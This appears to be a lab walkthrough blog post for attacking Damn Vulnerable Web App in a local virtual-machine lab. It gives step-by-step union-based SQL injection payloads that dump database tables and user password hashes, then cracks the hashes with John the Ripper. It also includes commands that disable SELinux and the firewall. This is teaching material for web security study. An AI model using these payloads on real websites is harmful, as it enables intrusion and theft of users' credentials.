{ Manual SQL Injection, John the Ripper }
| Section 0. Background Information |
- What is Damn Vulnerable Web App (DVWA)?
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
- Pre-Requisite Lab
- Lab Notes
- In this lab we will do the following:
- We use inject always true SQL statements into the SQL Injection User ID field with security set to low.
- We will obtain the username and raw-MD5 password contents from the users table.
- We will use John the Ripper to crack the raw-MD5 password HASH for each user.
- Legal Disclaimer
Bài lab chỉ dùng cho mục đích học tập
| Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit BackTrack Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click on the OK Button.
| Section 2. Login to Fedora14 |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14
- Play virtual machine
- Login to Fedora14
- Instructions:
- Login: student
- Password: <whatever you set it to>.
-
| Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
-
- Get IP Address
- Instructions:
- ifconfig -a
- Notes:
- As indicated below, my IP address is 192.168.1.106.
- Please record your IP address.
| Section 4. Temporarily Disable SELINUX and Firewall |
- Start a Terminal Console
- Instructions:
- sestatus
- If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
- If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
- Notes:
- In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
- Place selinux in permissive mode
- Instructions:
- echo 0 > /selinux/enforce
- Placing a "0" in the enforce file, puts selinux in permissive mode.
- sestatus
- Notice that "Current mode:" changed to permissive.
-
- Disable Firewall
- Instructions:
- service iptables save
- This is not really necessary, unless you have made recent changes to the firewall.
- service iptables stop
- This command disables the firewall.
| Section 5. Configure BackTrack Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit BackTrack Virtual Machine Settings
- Instructions:
- Highlight BackTrack5R1
- Click Edit virtual machine settings
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Do not Click on the OK Button.
| Section 6. Login to BackTrack |
- Start BackTrack VM Instance
- Instructions:
- Start Up VMWare Player
- Select BackTrack5R1
- Play virtual machine
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up the GNOME
- Instructions:
- Type startx
| Section 7. Open Console Terminal and Retrieve IP Address |
- Open a console terminal
- Instructions:
- Click on the console terminal
- Get IP Address
- Instructions:
- ifconfig -a
- Notes:
- As indicated below, my IP address is 192.168.1.105.
- Please record your IP address.
- Start Firefox
- Instructions:
- Click on Firefox
- Login to DVWA
- Instructions:
- Start up Firefox on BackTrack
- Place http://192.168.1.106/dvwa/login.php in the address bar.
- Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
- Login: admin
- Password: password
- Click on Login
| Section 9. Set Security Level |
- Set DVWA Security Level
- Instructions:
- Click on DVWA Security, in the left hand menu.
- Select "low"
- Click Submit
| Section 10. Manual SQL Injection |
- SQL Injection Menu
- Instructions:
- Select "SQL Injection" from the left navigation menu.
-
- Basic Injection
- Instructions:
- Input "1" into the text box.
- Click Submit.
- Note, webpage/code is supposed to print ID, First name, and Surname to the screen.
- Notes:
- Below is the PHP select statement that we will be exploiting, specifically $id.
- $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
- Always True Scenario
- Instructions:
- Input the below text into the User ID Textbox (See Picture).
- Click Submit
- Notes:
- In this scenario, we are saying display all record that are false and all records that are true.
- %' - Will probably not be equal to anything, and will be false.
- '0'='0' - Is equal to true, because 0 will always equal 0.
- Database Statement
- mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
- Display Database Version
- Instructions:
- Input the below text into the User ID Textbox (See Picture).
- %' or 0=0 union select null, version() #
- Click Submit
- Notes:
- Notice in the last displayed line, 5.1.60 is displayed in the surname.
- This is the version of the mysql database.
- Display Database User
- Instructions:
- Input the below text into the User ID Textbox (See Picture).
- %' or 0=0 union select null, user() #
- Instructions:
- Notice in the last displayed line, root@localhost is displayed in the surname.
- This is the name of the database user that executed the behind the scenes PHP code.
- Display Database Name
- Instructions:
- Input the below text into the User ID Textbox (See Picture).
- %' or 0=0 union select null, database() #
- Instructions:
- Notice in the last displayed line, dvwa is displayed in the surname.
- This is the name of the database.
- Display all tables in information_schema
- Instructions:
- Input the below text into the User ID Textbox (See Picture).
- %' and 1=0 union select null, table_name from information_schema.tables #
- Click Submit
- Notes:
- Now we are displaying all the tables in the information_schema database.
- The INFORMATION_SCHEMA is the information database, the place that stores information about all the other databases that the MySQL server maintains.
- Display all the user tables in information_schema
- Instructions:
- Input the below text into the User ID Textbox (See Picture).
- %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
- Click Submit
- Notes:
- Now we are displaying all the tables that start with the prefix "user" in the information_schema database.
- Display all the columns fields in the information_schema user table
- Instructions:
- Input the below text into the User ID Textbox (See Picture).
- %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
- Click Submit
- Notes:
- Now we are displaying all the columns in the users table.
- Notice there are a user_id, first_name, last_name, user and Password column.
- Display all the columns field contents in the information_schema user table
- Instructions:
- Input the below text into the User ID Textbox (See Picture).
- %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
- Click Submit
- Notes:
- Now we have successfully displayed all the necessary authentication information into this database.
| Section 11. Create Password Hash File |
- Create Password Hash File
- Instructions:
- Highlight both admin and the password hash
- Right Click
- Copy
- Open Notepad
- Instructions:
- Applications --> Wine --> Programs --> Accessories --> Notepad
- Paste in Notepad
- Instructions:
- Edit --> Paste
- Format in Notepad
- Instructions:
- Place a ":" immediately after admin
- Make sure your cursor is immediately after the ":" and hit the delete button.
- Now you should see the user admin and the password hash separated by a ":" on the same line.
- Cut the username and password combinations for gordonb, 1337, pablo, and smitty from (Section 11, Step 1) and paste in this file as well.
- Save in Notepad
- Instructions:
- Navigate to --> /pentest/passwords/john
- Name the file name --> dvwa_password.txt
- Click Save
| Section 11. Proof of Lab Using John the Ripper |
- Proof of Lab
- Instructions:
- Bring up a new terminal, see (Section 7, Step 1)
- cd /pentest/passwords/john
- ./john --format=raw-MD5 dvwa_password.txt
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a <PrtScn>
- Paste into a word document
- Email to CSIRT247@Gmail.Com
-
0 nhận xét:
Đăng nhận xét